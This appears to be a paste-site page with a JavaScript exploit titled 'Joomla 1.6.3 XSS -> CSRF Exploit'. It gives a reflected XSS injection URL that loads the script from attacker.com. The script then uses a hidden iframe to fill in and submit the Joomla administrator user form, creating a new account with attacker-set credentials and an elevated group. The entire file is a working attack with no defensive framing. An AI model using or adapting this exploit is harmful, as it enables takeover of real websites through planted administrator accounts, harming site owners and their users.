lalalalalalala

Posted by Anonymous on May Mon 7th 9:49 AM - Never Expires| View : 72
Syntax: JAVASCRIPT
1267 characters | 26 lines | 1.24 KB
DOWNLOAD | RAW | EMBED | CREATE NEW VERSION OF THIS PASTE | REPORT ABUSE | x
  1. /*
  2. joom163.js
  3. Joomla 1.6.3 XSS -> CSRF Exploit
  4. Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
  5. Coded By: Connection
  7. Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>
  9. */
  10. document.writeln('<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></iframe>');
  11.  
  12. function read()
  13. {
  14. var name="Test";
  15. var username="haxx";
  16. var password="test123";
  17. var email="fake _at_ gmail.com";
  18.  
  19. document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
  20. document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
  21. document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
  22. document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
  23. document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
  24. document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
  25. document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
  26. }